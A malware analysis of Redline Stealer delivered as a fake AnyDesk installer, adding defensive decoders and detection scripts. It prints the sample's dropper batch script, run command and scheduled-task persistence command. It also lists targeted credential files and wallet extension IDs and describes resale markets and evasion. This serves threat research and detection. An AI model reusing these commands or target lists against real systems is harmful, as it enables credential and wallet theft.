Redline Stealer is one of the most popular stealers sold to and used by cybercriminals. Its command and control (C2) panel does not require the attacker to log in through a web UI; everything is managed from the Redline client on the attacker's virtual private server (VPS). The stealer bundles several capabilities, including payload obfuscation, which makes it easy for attackers to operate.
This malware analysis delves deeper into the technical details of how the Redline Stealer malware operates and our security recommendations to protect your organization from being exploited.
eSentire's Threat Response Unit (TRU) has observed Redline Stealer being distributed as a fake AnyDesk installer. The landing page of the malicious website is identical to the legitimate AnyDesk website (Figures 1-2).
The fake AnyDesk installer is delivered as an ISO image and is 312 MB in size. Padding the binary with junk bytes is common practice for stealers, since some sandboxes and antivirus products skip files above a size limit. The infection chain is shown in Figure 3.
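A first triage question for an oversized dropper like this one is how much of the file is actually mapped by the PE and how much is filler. The script below is an added example for this write-up, not eSentire's or the sample's code: it parses the section table by hand, measures the overlay (everything after the last section) and reports its entropy and dominant byte. The stub PE it builds is constructed so the check runs offline; it is not the AnyDesk installer.

```python
# Added example (not eSentire's or the sample's code): triage a suspected
# size-padded dropper by measuring the PE overlay, i.e. the bytes after the last
# section, and how much of it is near-constant filler. The stub PE built below is
# constructed so the check runs offline; it is not the AnyDesk installer.
import math
import struct
from collections import Counter


def pe_overlay_offset(data: bytes) -> int:
    """Offset where the overlay begins: the end of the highest-placed section's raw data."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                   # COFF file header (20 bytes)
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + opt_size                          # section table follows the optional header
    end = 0
    for i in range(num_sections):
        raw_size, raw_ptr = struct.unpack_from("<II", data, table + 40 * i + 16)
        end = max(end, raw_ptr + raw_size)
    return end


def shannon_entropy(chunk: bytes) -> float:
    if not chunk:
        return 0.0
    n = len(chunk)
    return -sum(c / n * math.log2(c / n) for c in Counter(chunk).values())


def overlay_report(data: bytes) -> dict:
    start = pe_overlay_offset(data)
    overlay = data[start:]
    top = Counter(overlay).most_common(1)
    return {
        "overlay_offset": start,
        "overlay_bytes": len(overlay),
        "overlay_share": len(overlay) / len(data),
        "overlay_entropy": round(shannon_entropy(overlay), 3),
        "dominant_byte_share": top[0][1] / len(overlay) if top else 0.0,
    }


def looks_padded(report: dict, min_share: float = 0.5, max_entropy: float = 1.0) -> bool:
    """Most of the file sits outside any section and that region is low-entropy filler."""
    return report["overlay_share"] >= min_share and report["overlay_entropy"] <= max_entropy


def build_stub_pe(code: bytes, padding: bytes) -> bytes:
    """Constructed, non-runnable PE layout (DOS stub, COFF header, one section, overlay)."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0x0102)   # i386, one section, no optional header
    raw_ptr = e_lfanew + 4 + 20 + 40                                 # data starts right after the section table
    section = b".text".ljust(8, b"\0") + struct.pack(
        "<IIIIIIHHI", len(code), 0x1000, len(code), raw_ptr, 0, 0, 0, 0, 0x60000020)
    return dos + b"PE\0\0" + coff + section + code + padding


if __name__ == "__main__":
    sample = build_stub_pe(b"\x90" * 64, b"\x00" * 4096)   # 64 bytes of code, 4 KB of filler
    print(overlay_report(sample), looks_padded(overlay_report(sample)))
```

The overlay share is the primary signal; the entropy figure only distinguishes repeated-byte filler from random junk, and self-extracting installers legitimately carry large, high-entropy overlays, so the report is a triage aid rather than a verdict.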
The AnyDesk binary contains the cabinet file within RCData (Figure 4). The extracted cabinet file contains the following:
The AnyDesk binary's POSTRUNPROGRAM entry (the command an IExpress-built package runs after extracting its CAB contents) is cmd /c cmd < Saputo.potm & ping -n 5 localhost. Feeding Saputo.potm to cmd.exe on standard input executes the obfuscated script; the five pings to localhost stand in for a sleep, which cmd lacks, and give the script a few seconds to finish.
The deobfuscated Saputo.potm file is shown below (line breaks restored; the percent signs that delimit the random variable names appear not to have survived extraction):
tasklist /FI "imagename eq PSUAService.exe" 2>NUL | find /I /N "psuaservice.exe">NUL
if not errorlevel 1 Set pEoQCZpLBzfzlhEvxHCjS=autoit.exe
<nul set /p = "ZcDpijTWATBmXUDhlfiobLGsqbhgrZ" > pEoQCZpLBzfzlhEvxHCjS
MrKXuUkCoPoGpMSbrwAewuXYoFFLRDZyqNxindstr /V /R "^YbeRstbFtOUDIqBrtdMHJUtzjhOkoKZFTdVtvyDmPFkahUrGQWaXBcArzIFrfkvxPgKsybGZNhRtJLyalocksetbQRLOA$" Ritornata.potm >> pEoQCZpLBzfzlhEvxHCjS
ZcDpijTWATBmXUDhlfiobLGsqbhgrove Imagine.* t
pEoQCZpLBzfzlhEvxHCjS t
ping localhost -n 5
The script looks for PSUAService.exe, a component of Panda Cloud Antivirus, on the infected system. If that antivirus is not present, the script rebuilds the AutoIt interpreter under the name autoit.exe: it writes a short prefix into the new file, appends the contents of Ritornata.potm with the marker line removed by findstr /V, appears to move Imagine.* to t, and finally runs the rebuilt interpreter with t as its script. The closing ping is another few-second delay.
imagine.potm contains the obfuscated AutoIt script in which Redline Stealer resides. The Redline binary embedded in the obfuscated AutoIt script is shown in Figure 6.
The RC4 key used to decode the script is built from a "["-separated list of decimal values, each reduced by 2, as shown below (snippet of the obfuscated AutoIt script):
$jnpcgiMxrEdJ = zRAVrukiOcYK(mygFPnMUDEBWrobGzyl(mwKlCHGodCtOveXOxogMpp(Binary($uSDnetQy), Binary(TtmigjRVnUPf("59[53[51[58[53[53[56[53[58[59",2)))), $UkyGgZA, $XUeaTHbWBqM)
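To make the key derivation concrete, the following is an added example for this post rather than the malware's or eSentire's code. It rebuilds the key the way the AutoIt helper appears to (split on "[", subtract the second argument, treat each result as a character) and runs RC4 with it. That the values become characters is an inference from the snippet, the encrypted blob is constructed, and the real script passes the RC4 output through two further helper functions that are not reproduced here.

```python
# Added example (not the malware's or eSentire's code): rebuild the RC4 key the way
# the AutoIt helper appears to, from a "["-separated list of decimals each reduced
# by the second argument (2) and turned into a character, then run RC4 with it.
# That the values become characters, and the sample blob below, are assumptions;
# the real script also post-processes the RC4 output.

ENCODED_KEY = "59[53[51[58[53[53[56[53[58[59"   # literal from the snippet above
KEY_DELTA = 2


def derive_key(encoded: str, delta: int = KEY_DELTA) -> bytes:
    """'59[53[...' -> bytes(57, 51, ...) -> b'9318336389'."""
    return bytes(int(v) - delta for v in encoded.split("["))


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). The same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):                                   # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:                                      # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decode_script(encoded_key: str, blob: bytes) -> bytes:
    return rc4(derive_key(encoded_key), blob)


# Constructed stand-in for the encrypted script body: a harmless AutoIt line
# encrypted with the derived key so the decoder has something to work on offline.
SAMPLE_PLAINTEXT = b'MsgBox(0, "demo", "constructed sample, not the stealer")'
SAMPLE_BLOB = rc4(derive_key(ENCODED_KEY), SAMPLE_PLAINTEXT)

if __name__ == "__main__":
    print(derive_key(ENCODED_KEY))
    print(decode_script(ENCODED_KEY, SAMPLE_BLOB))
```

With the snippet's literal, derive_key yields the ten-character key 9318336389; against a real sample, swap in the string and delta found in the script's own call and feed the result of the outer helper functions to the next decoding stage.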
The eSentire TRU team has observed that the threat actor(s) have been using the AutoIt wrapper to obfuscate stealers such as Mars Stealer. For a more in-depth analysis, read our blog on Mars Stealer wrapped with AutoIt.
After the binary executes, the files listed in Figure 4 are extracted from the CAB file into an IXPxxx.TMP folder under %TEMP% (Figure 7), together with a renamed copy of NTDLL.DLL. Loading a private copy of ntdll.dll at runtime is a known technique for sidestepping EDR products that place user-mode hooks in the system copy's exported functions; we described it briefly in our Mars Stealer analysis.
An additional folder is created for a scheduled task to run from; the task is the persistence mechanism that keeps the infected host periodically communicating with the C2.
The scheduled task creation command line is shown below. The task is named Puoi and runs PJDKIgRDMm.exe.com (presumably the renamed AutoIt interpreter) with the file z under %TEMP%\zqNDtAgMrV, the obfuscated AutoIt script containing the stealer, every 3 minutes:
schtasks.exe /create /tn "Puoi" /tr "C:\Users\user\AppData\Local\Temp\zqNDtAgMrV\PJDKIgRDMm.exe.com C:\Users\user\AppData\Local\Temp\zqNDtAgMrV\z" /sc minute /mo 3 /F
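Both the POSTRUNPROGRAM chain and the persistence task above leave distinctive process-creation command lines. The following is an added example for this write-up, not eSentire's detection content: it flags cmd.exe being fed commands from a non-script file alongside a ping-to-localhost sleep, and a schtasks /create that repeats every few minutes and runs a double-extension binary out of a Temp directory. The events it runs over are constructed (the first two mirror the quoted command lines; the parent image names are assumptions), not real telemetry.

```python
# Added example (not eSentire's detection content): flag the two dropper
# behaviours quoted above in process-creation telemetry. Events are constructed.
import re
import shlex
from dataclasses import dataclass
from typing import Dict, List

STDIN_REDIRECT = re.compile(r"\bcmd(?:\.exe)?\s*<\s*(\S+)", re.IGNORECASE)
PING_SLEEP = re.compile(
    r"\bping(?:\.exe)?\s+(?:-n\s+\d+\s+)?(?:localhost|127\.0\.0\.1|::1)(?:\s+-n\s+\d+)?",
    re.IGNORECASE)
TEMP_DIR = re.compile(r"\\(?:AppData\\Local\\Temp|Windows\\Temp)\\", re.IGNORECASE)
DOUBLE_EXT = re.compile(r"\.(?:exe|dll|scr)\.(?:com|exe|pif|scr)\b", re.IGNORECASE)
SCRIPT_EXT = (".bat", ".cmd")


@dataclass
class ProcEvent:
    image: str
    parent_image: str
    command_line: str


def flag_cmd_stdin_chain(ev: ProcEvent) -> List[str]:
    """cmd.exe reading its commands from stdin, plus the ping-as-sleep idiom."""
    hits = []
    m = STDIN_REDIRECT.search(ev.command_line)
    if m:
        src = m.group(1).strip('"')
        if not src.lower().endswith(SCRIPT_EXT):
            hits.append(f"cmd.exe reads its commands from non-script file {src}")
        if PING_SLEEP.search(ev.command_line):
            hits.append("ping to localhost used as a sleep in the same command line")
    return hits


def _option(tokens: List[str], name: str):
    low = [t.lower() for t in tokens]
    if name in low and low.index(name) + 1 < len(tokens):
        return tokens[low.index(name) + 1]
    return None


def flag_schtasks(ev: ProcEvent) -> List[str]:
    """schtasks /create with a short minute interval and a suspicious action path."""
    cl = ev.command_line
    if not re.search(r"\bschtasks(?:\.exe)?\b", cl, re.IGNORECASE) or "/create" not in cl.lower():
        return []
    tokens = shlex.split(cl, posix=False)          # keeps Windows paths and quotes intact
    hits = []
    sc, mo, tr = _option(tokens, "/sc"), _option(tokens, "/mo"), _option(tokens, "/tr")
    if sc and sc.lower() == "minute" and mo and mo.isdigit() and int(mo) <= 5:
        hits.append(f"task repeats every {mo} minute(s)")
    if tr:
        if TEMP_DIR.search(tr):
            hits.append("task action runs from a Temp directory")
        if DOUBLE_EXT.search(tr):
            hits.append("task action has a double extension")
    return hits


def triage(events: List[ProcEvent]) -> Dict[str, List[str]]:
    findings = {}
    for ev in events:
        hits = flag_cmd_stdin_chain(ev) + flag_schtasks(ev)
        if hits:
            findings[ev.command_line] = hits
    return findings


SAMPLE_EVENTS = [  # constructed; the first two mirror the command lines quoted in the analysis
    ProcEvent("cmd.exe", "installer.exe", "cmd /c cmd < Saputo.potm & ping -n 5 localhost"),
    ProcEvent("schtasks.exe", "cmd.exe",
              r'schtasks.exe /create /tn "Puoi" /tr "C:\Users\user\AppData\Local\Temp\zqNDtAgMrV\PJDKIgRDMm.exe.com '
              r'C:\Users\user\AppData\Local\Temp\zqNDtAgMrV\z" /sc minute /mo 3 /F'),
    ProcEvent("schtasks.exe", "svchost.exe",
              r'schtasks.exe /create /tn "Backup" /tr "C:\Program Files\Acme\backup.exe" /sc daily /st 02:00'),
    ProcEvent("cmd.exe", "explorer.exe", "cmd /c ping -n 2 localhost"),
]

if __name__ == "__main__":
    for cmdline, hits in triage(SAMPLE_EVENTS).items():
        print(cmdline, "->", hits)
```

The benign daily task and the lone ping produce no findings, while the two dropper command lines trip two and three indicators respectively; in production the same logic would sit on Sysmon event 1 or EDR process telemetry and weight the combination rather than any single match.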
The deobfuscated AutoIt payload contains Redline Stealer, which the renamed AutoIt process decrypts and injects into a jsc.exe process (Figure 7).
The extracted .NET Redline payload is approximately 619 KB (MD5: ee5c2ec0ec6d2b5b9c2396fb7513f83b); the original filename is Test.exe and the compilation timestamp is July 24, 2022. Opening the file in a debugger shows the stealer enumerating installed browsers, FTP connections, security tools, software and crypto wallets on the victim's machine (Figure 9).
We can also see the stealer collecting credit card (CC) information on the infected host from Chrome browsers (Figure 10).
Redline Stealer, also known as REDGlade and Glade, first appeared on hacking forums in February 2020 (Figure 11). Redline was allegedly written based on feedback from people involved in carding, the unauthorized use of stolen credit card data.
Similar to Raccoon Stealer, Redline requires a dedicated VPS (Virtual Private Server) to host the panel. The stealer can be bought through a Telegram bot (Figure 12) with cryptocurrency; the price is USD 150 per month or USD 900 for lifetime access. Upon purchase, the buyer receives a link to a private Telegram chat. At the time of this analysis roughly 400 members were part of the group, and a review of the chats showed native Russian speakers to be the most active. Once the subscription expires, the user is removed from the private chat.
Redline Stealer capabilities include:
What makes Redline Stealer popular is that the control panel is quite easy to navigate through; once the user buys the stealer, they get the detailed instructions in English and Russian on Redline functionality and installation steps (Figure 13).
It is worth noting that there are a number of fake Redline sellers on Telegram who profit by luring those interested in acquiring Redline Stealer, scamming them by taking their money, and not providing Redline in exchange. Upon purchasing a Redline subscription, the user gets the link to the private Telegram chat and the request to access chat must be approved by the administrator.
The Redline panel (Figure 14) is easy to navigate through and contains the following sections:
Facebook logs are among the most popular stolen logs sold on hacking forums (Figures 22-23). Stealer logs that contain cookies are especially attractive: a valid session cookie lets the attacker resume an already-authenticated session, so neither the password nor the second factor is ever requested, and the attacker is effectively logged in as the victim on platforms such as YouTube and Facebook.
Cybercriminals buy stolen Facebook accounts to push malicious advertisements without the owner's knowledge. "Spend logs" are accounts on which the attacker can spend a certain amount per day to publish their ads (Figure 22).
There are numerous services available where attackers can sell their stolen logs. The prices depend on what type of logs they are selling (Figure 24).
Redline logs are also in high demand on dark web markets such as RussianMarket. We can see that compared to other stealers, Redline logs are the most sold by cybercriminals (Figure 25).
It is worth noting that Redline is distributed not only via cracked or fake software. Other channels are install services and YouTube traffic (Figure 26). With YouTube traffic, the attacker creates or buys a channel and uploads a short video whose description lures viewers into installing the application via a direct link.
Install services push the stealer through third-party advertising networks or platforms; the advertising service displays the ads on various webpages to visitors from the countries the attacker specifies (Figure 27).
More seasoned cybercriminals usually crypt or obfuscate the payload with well-known crypters advertised in hacking channels, such as Mastif and 11. Redline itself advertises a crypter named Spectrcrypt (Spectrum Crypt), which is included free with a one-month subscription (Figure 28).
The Redline logs are quite popular for sale on hacker forums and Telegram (Figures 29-30).
The non-obfuscated Redline payload is a 32-bit .NET binary of about 107 KB. The hash and original filename change every time a build is generated from the Redline panel.
The Argument class contains the encoded payload configuration for C2 communication including the IP address, Build ID, version and the XOR key used to decrypt the configuration parameters (Figure 31).
The encoded strings are produced by Base64-encoding the plaintext, XOR-ing the result with the hardcoded key "Raves", and Base64-encoding it again (Figure 32); decoding reverses those three steps.
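The decoder for that scheme is short enough to show in full. This is an added example for this post, not eSentire's or the malware's code: it reverses the three layers (Base64, XOR, Base64) for every string of an Argument-style block. The key "Raves" is the one quoted above; that the key repeats cyclically over the data, and the TEST-NET address, build ID and version in the sample block, are assumptions.

```python
# Added example (not eSentire's or the malware's code): reverse the two-layer
# string scheme described above. Decoding is Base64 -> XOR with the repeating key
# -> Base64. "Raves" is the key quoted in the analysis; that it repeats
# cyclically, and the sample values below, are assumptions.
import base64
from typing import Dict

XOR_KEY = "Raves"


def xor_repeat(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_config(plain: str, key: str = XOR_KEY) -> str:
    """plain -> Base64 -> XOR(key) -> Base64 (what the builder does)."""
    inner = base64.b64encode(plain.encode("utf-8"))
    return base64.b64encode(xor_repeat(inner, key.encode("utf-8"))).decode("ascii")


def decode_config(blob: str, key: str = XOR_KEY) -> str:
    """Undo encode_config: Base64 -> XOR(key) -> Base64 -> plain."""
    inner = xor_repeat(base64.b64decode(blob), key.encode("utf-8"))
    return base64.b64decode(inner).decode("utf-8")


def decode_arguments(fields: Dict[str, str], key: str = XOR_KEY) -> Dict[str, str]:
    """Decode every string of an Argument-style configuration block."""
    return {name: decode_config(value, key) for name, value in fields.items()}


# Constructed configuration (TEST-NET address, made-up build id and version).
SAMPLE_ARGUMENTS = {
    "IP": encode_config("203.0.113.10:1912"),
    "ID": encode_config("build-demo"),
    "Version": encode_config("1.0.0"),
}

if __name__ == "__main__":
    print(SAMPLE_ARGUMENTS)
    print(decode_arguments(SAMPLE_ARGUMENTS))
```

Against a real build, lift the key and the four encoded fields from the Argument class and call decode_arguments; a wrong key shows up immediately as a Base64 decoding error or non-printable output rather than a plausible-looking address.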
Under Entity16, the stealer enumerates the Login Data, Web Data and Cookies database files of Chrome and Opera GX Stable. It also searches the Local Extension Settings folder of Chrome for crypto wallet browser extensions (Figure 33).
The crypto wallet extensions decoded from the Base64-encoded blob, as extension ID|name (the decoded list repeats its first 32 entries; the repeat is collapsed here, and note that the same ID is listed for both AtomicWallet and Oxygen):
ffnbelfdoeiohenkjibnmadjiehjhajb|YoroiWallet
ibnejdfjmmkpcnlpebklmnkoeoihofec|Tronlink
jbdaocneiiinmjbjlgalhcelgbejmnid|NiftyWallet
nkbihfbeogaeaoehlefnkodbefgpgknn|Metamask
afbcbjpbpfadlkmhmclhkeeodmamcflc|MathWallet
hnfanknocfeofbddgcijnmhnfnkdnaad|Coinbase
fhbohimaelbohpjbbldcngcnapndodjp|BinanceChain
odbfpeeihdkbihmopkbjmoonfanlbfcl|BraveWallet
hpglfhgfnhbgpjdenjgmdgoeiappafln|GuardaWallet
blnieiiffboillknjnepogjhkgnoapac|EqualWallet
cjelfplplebdjjenllpjcblmjkfcffne|JaxxxLiberty
fihkakfobkmkjojpchpfgcmhfjnmnfpi|BitAppWallet
kncchdigobghenbbaddojjnnaogfppfj|iWallet
amkmjjmmflddogmhpjloimipbofnfjih|Wombat
fhilaheimglignddkjgofkcbgekhenbh|AtomicWallet
nlbmnnijcnlegkjjpcfjclmcfggfefdm|MewCx
nanjmdknhkinifnkgdcggcfnhdaammmj|GuildWallet
nkddgncdjgjfcddamfgcmfnlhccnimig|SaturnWallet
fnjhmkhhmkbjkkabndcnnogagogbneec|RoninWallet
aiifbnbfobpmeekipheeijimdpnlpgpp|TerraStation
fnnegphlobjdpkhecapkijjdkgcjhkib|HarmonyWallet
aeachknmefphepccionboohckonoeemg|Coin98Wallet
cgeeodpfagjceefieflmdfphplkenlfk|TonCrystal
pdadjkfkgcafgbceimcpbkalnfnepbnk|KardiaChain
bfnaelmomeimhlpmgjnjophhpkkoljpa|Phantom
fhilaheimglignddkjgofkcbgekhenbh|Oxygen
mgffkfbidihjpoaomajlbgchddlicgpn|PaliWallet
aodkkagnadcbobfpggfnjeongemjbjca|BoltX
kpfopkelmapcoipemfendmdcghnegimn|LiqualityWallet
hmeobnfnfcmdkdcmlblgagmfpfboieaf|XdefiWallet
lpfcbjknijpeeillifnkikgncikgfhdo|NamiWallet
dngmlblcodfobpdpecaadgfbcggfjfnm|MaiarDeFiWallet
bhghoamapcdpbohphigoooaddinpkbai|Authenticator
ookjlbkiijinhpmnjffcofjonbfbgaoc|TempleWallet
Entity15 is likely used for performing the loader tasks (Figure 34).
The ConfigReader class looks for crypto wallets in the folders specified by an attacker in settings. Entity17 contains the information on crypto wallets. Entity16 stores the path to crypto wallets (Figure 35).
The ConnectionProvider class holds Redline's C2 communication method. Communication with the C2 server uses Windows Communication Foundation (WCF) with NetTcpBinding, whose TCP transport speaks the net.tcp:// protocol; the destination port is chosen by the attacker (Figure 36).
Figure 37 shows an example of C2 traffic generated by a workstation infected with Redline; it carries the stealer configuration, the C2 IP, host information and a listing of files on the host. tempuri[.]org is the default WCF namespace and should not be treated as the only indicator of a Redline compromise.
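Because every WCF NetTcpBinding session opens with the .NET Message Framing preamble, the Via URI that names the server (here, the attacker's host and port) is visible in the first bytes of the TCP stream before any SOAP body or namespace. The parser below is an added example for this write-up, not eSentire's detection code: it decodes the preamble records as laid out in Microsoft's published MC-NMF specification and raises a finding for net.tcp sessions to hosts outside an allowlist. The byte string it parses is constructed rather than captured, and the Duplex mode and in-band-dictionary binary encoding it uses are common NetTcpBinding defaults that a real sample may not share.

```python
# Added example (not eSentire's code): parse the .NET Message Framing preamble that
# opens a WCF NetTcpBinding session and pull out the Via URI (the C2 host:port).
# Record codes follow the published MC-NMF specification; the bytes below are
# constructed, and the Duplex mode / binary encoding are common defaults only.
from typing import Optional, Set, Tuple

VERSION, MODE, VIA, KNOWN_ENCODING, UPGRADE_REQUEST, PREAMBLE_END = 0x00, 0x01, 0x02, 0x03, 0x09, 0x0C
MODES = {0x01: "SingletonUnsized", 0x02: "Duplex", 0x03: "Simplex", 0x04: "SingletonSized"}
ENCODINGS = {0x00: "UTF-8 SOAP 1.1", 0x01: "UTF-16 SOAP 1.1", 0x02: "Unicode LE SOAP 1.1",
             0x03: "UTF-8 SOAP 1.2", 0x04: "UTF-16 SOAP 1.2", 0x05: "Unicode LE SOAP 1.2",
             0x06: "MTOM", 0x07: "Binary", 0x08: "Binary with in-band dictionary"}


def read_size(buf: bytes, pos: int) -> Tuple[int, int]:
    """MC-NMF record size: 7 bits per byte, least significant first, high bit = more."""
    value = shift = 0
    while True:
        b = buf[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, pos
        shift += 7
        if shift > 28:
            raise ValueError("size field too long")


def encode_size(n: int) -> bytes:
    out = bytearray()
    while True:
        out.append((n & 0x7F) | (0x80 if n > 0x7F else 0))
        n >>= 7
        if not n:
            return bytes(out)


def parse_nmf_preamble(buf: bytes) -> dict:
    if buf[:3] != bytes([VERSION, 0x01, 0x00]):
        raise ValueError("not an MC-NMF 1.0 preamble")
    info, pos = {"version": "1.0", "complete": False}, 3
    while pos < len(buf) and not info["complete"]:
        rec = buf[pos]
        pos += 1
        if rec == MODE:
            info["mode"] = MODES.get(buf[pos], f"unknown(0x{buf[pos]:02x})")
            pos += 1
        elif rec == KNOWN_ENCODING:
            info["encoding"] = ENCODINGS.get(buf[pos], f"unknown(0x{buf[pos]:02x})")
            pos += 1
        elif rec == VIA:
            n, pos = read_size(buf, pos)
            info["via"] = buf[pos:pos + n].decode("utf-8")
            pos += n
        elif rec == UPGRADE_REQUEST:          # e.g. application/ssl-tls; the stream is wrapped from here on
            n, pos = read_size(buf, pos)
            info["upgrade"] = buf[pos:pos + n].decode("utf-8")
            break
        elif rec == PREAMBLE_END:
            info["complete"] = True
        else:
            raise ValueError(f"unexpected record 0x{rec:02x}")
    return info


def net_tcp_alert(buf: bytes, allowed_hosts: Set[str]) -> Optional[str]:
    """Finding text when a net.tcp session targets a host outside the allowlist, else None."""
    try:
        info = parse_nmf_preamble(buf)
    except (ValueError, IndexError):
        return None
    via = info.get("via", "")
    if not via.startswith("net.tcp://"):
        return None
    host_port = via[len("net.tcp://"):].split("/", 1)[0]
    if host_port.rsplit(":", 1)[0] in allowed_hosts:
        return None
    return (f"net.tcp session to {host_port} ({info.get('mode')}, {info.get('encoding')}, "
            f"upgrade={info.get('upgrade', 'none')}) is not an approved WCF endpoint")


def build_preamble(via: str) -> bytes:
    """Constructed client preamble, used here instead of a packet capture."""
    v = via.encode("utf-8")
    return (bytes([VERSION, 0x01, 0x00, MODE, 0x02, VIA]) + encode_size(len(v)) + v
            + bytes([KNOWN_ENCODING, 0x08, PREAMBLE_END]))


if __name__ == "__main__":
    sample = build_preamble("net.tcp://203.0.113.5:4444/")
    print(parse_nmf_preamble(sample))
    print(net_tcp_alert(sample, {"wcf.corp.example"}))
```

Two caveats when turning this into a sensor rule: legitimate WCF services in the estate produce the same framing, so the allowlist of known net.tcp endpoints does the real work; and if the binding negotiates transport security, an Upgrade Request record appears and everything after the upgrade is TLS or SSPI-wrapped, but the Via URI has already been sent in the clear by then.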
Entity5 gathers Discord tokens from the .log and .db files under \AppData\Roaming\discord\Local Storage\leveldb (Figure 38). Redline harvests them because a Discord token authenticates the session on its own: whoever holds it can access the account without the password or the second factor. For detection evasion, Redline inserts random words into its strings and strips them out at runtime.
Entity6 contains the module responsible for launching the loader tasks DownloadAndEx and Download (Figure 39).
Entity8, 10, 11 and 12 within the EntityCreator class scan for autofill data, cookies, credentials and credit cards respectively (Figure 40). The credentials are then decrypted in the EntityReader class.
Redline does not exfiltrate logs from CIS countries. The stealer checks the infected machine's local time zone and default user-interface language for those used in CIS countries (Figure 41).
PartsSender class contains all the information (logs) that are sent to the attacker including user’s system information, files, wallets, credentials, and screenshot (Figure 42).
The Redline developers cleverly named the Telegram stealing module RosComNadzor (The Federal Service for Supervision of Communications, Information Technology and Mass Media).
Finally, SystemInfoHelper class (Figure 43) gathers the user’s system information, list of processes, browsers, installed programs, and sends them to the attacker as text files (Figures 44-45).
Our Threat Response Unit (TRU) combines threat intelligence obtained from research and security incidents to create practical outcomes for our customers. We are taking a comprehensive response approach to combat modern cybersecurity threats by deploying countermeasures, such as:
Our detection content is supported by investigation runbooks, ensuring our team of 24/7 SOC Cyber Analysts respond rapidly to any intrusion attempts related to known malware Tactics, Techniques, and Procedures (TTPs). In addition, TRU closely monitors the threat landscape and constantly addresses capability gaps and conducts retroactive threat hunts to assess customer impact.
We recommend implementing the following controls to help secure your organization against the Redline Stealer malware:
As the TTPs used by threat actors grow in sophistication, defenders face harder decisions about where to invest. Preventing the techniques and tactics used by modern threat actors requires actively monitoring the threat landscape, developing and deploying endpoint detections, and being able to investigate log and network data during active intrusions.